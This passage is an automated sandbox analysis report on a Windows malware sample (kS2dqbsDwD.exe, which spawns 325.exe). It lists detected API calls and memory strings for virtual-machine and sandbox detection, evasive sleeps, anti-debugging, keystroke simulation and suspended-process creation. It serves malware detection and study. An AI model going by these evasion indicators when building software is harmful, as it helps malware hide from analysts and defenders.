Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140044A00 IsDlgButtonChecked,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,IsDlgButtonChecked, 0_2_0000000140044A00
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140071A10 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect, 0_2_0000000140071A10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C2BE0 IsIconic, 0_2_00000001400C2BE0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140040D29 IsZoomed,IsIconic, 0_2_0000000140040D29
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140079D90 IsDlgButtonChecked,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,IsDlgButtonChecked,GetWindowLongW,ShowWindow,EnableWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,IsDlgButtonChecked,SetFocus,MapWindowPoints,InvalidateRect, 0_2_0000000140079D90
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 325.exe PID: 4796, type: MEMORY
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\325.exe Window / User API: threadDelayed 440 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Window / User API: threadDelayed 7193 Jump to behavior
Is looking for software installed on the system
Source: C:\Users\user\AppData\Roaming\325.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\325.exe TID: 3868 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe TID: 5044 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe TID: 5644 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe TID: 3348 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140013FF0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014030h country: Spanish (es) 0_2_0000000140013FF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140014380 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 00000001400144F3h country: Russian (ru) 0_2_0000000140014380
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400055F0 GetKeyboardLayout followed by cmp: cmp ebx, 0ah and CTI: jl 0000000140005720h country: Spanish (es) 0_2_00000001400055F0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014000DAA0 GetKeyboardLayout followed by cmp: cmp word ptr [r14+02h], bp and CTI: jne 000000014000DBAAh 0_2_000000014000DAA0
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp word ptr [rbx], ax and CTI: je 0000000140046041h 0_2_0000000140045CF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140045F13h 0_2_0000000140045CF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0000000140087A90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose, 0_2_0000000140087B90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D080
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0000000140062320
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C2390 FindFirstFileW, 0_2_00000001400C2390
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D405
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D40F
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D419
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D423
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D44D
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D478
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D4A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D4BE
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D4DF
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D500
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D792 FindFirstFileW,GetLastError, 0_2_000000014004D792
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime, 0_2_000000014004D7E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D990
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose, 0_2_0000000140061A30
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose, 0_2_000000014004CAE0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_0000000140032DC0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose, 0_2_000000014004DFA0
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: vmware
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: kS2dqbsDwD.exe Binary or memory string: Hyper-V RAW
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\325.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00000001400B12B0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary, 0_2_0000000140060290
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C2648 GetStringTypeW,GetProcessHeap,IsValidCodePage, 0_2_00000001400C2648
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\325.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400BC054 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00000001400BC054
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00000001400B12B0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C24B8 SetUnhandledExceptionFilter, 0_2_00000001400C24B8
Source: C:\Users\user\AppData\Roaming\325.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW, 0_2_0000000140036D50
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140010F60 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState, 0_2_0000000140010F60
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140062600 mouse_event, 0_2_0000000140062600
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Roaming\325.exe Process created: C:\Users\user\AppData\Roaming\325.exe {path} Jump to behavior
Source: kS2dqbsDwD.exe Binary or memory string: Program Manager
Source: kS2dqbsDwD.exe Binary or memory string: Shell_TrayWnd
Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory"
Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Binary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%u...%s[%Iu of %Iu]: %-1.60s%s\:\:HKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPClipboardAllComSpecFalseProgramFilesTrueAhkPathAhkVersionAppDataAppDataCommonBatchLinesCaretXCaretYComputerNameControlDelayCoordModeCaretCoordModeMenuCoordModeMouseCoordModePixelCoordModeToolTipCursorDDDDDDDDDDefaultGuiDefaultListViewDefaultMouseSpeedDefaultTreeViewDesktopDesktopCommonEndCharEventInfoExitReasonFormatFloatFormatIntegerGuiControlEventGuiEventGuiHeightGuiWidthGuiXGuiYHourIconFileIconHiddenIconNumberIconTipIndexIPAddress1IPAddress2IPAddress3IPAddress4Is64bitOSIsAdminIsCompiledIsCriticalIsPausedIsSuspendedIsUnicodeKeyDelayKeyDelayPlayKeyDurationKeyDurationPlayLanguageLastErrorLineFileLineNumberLoopFieldLoopFileAttribLoopFileDirLoopFileExtLoopFileFullPathLoopFileLongPathLoopFileNameLoopFileShortNameLoopFileShortPathLoopFileSizeLoopFileSizeKBLoopFileSizeMBLoopFileTimeAccessedLoopFileTimeCreatedLoopFileTimeModifiedLoopReadLineLoopRegKeyLoopRegNameLoopRegSubKeyLoopRegTimeModifiedLoopRegTypeMDayMinMMMMMMMMMMonMouseDelayMouseDelayPlayMSecMyDocumentsNowNowUTCNumBatchLinesOSTypeOSVersionPriorHotkeyPriorKeyProgramsProgramsCommonPtrSizeRegViewScreenDPIScreenHeightScreenWidthScriptDirScriptFullPathScriptHwndScriptNa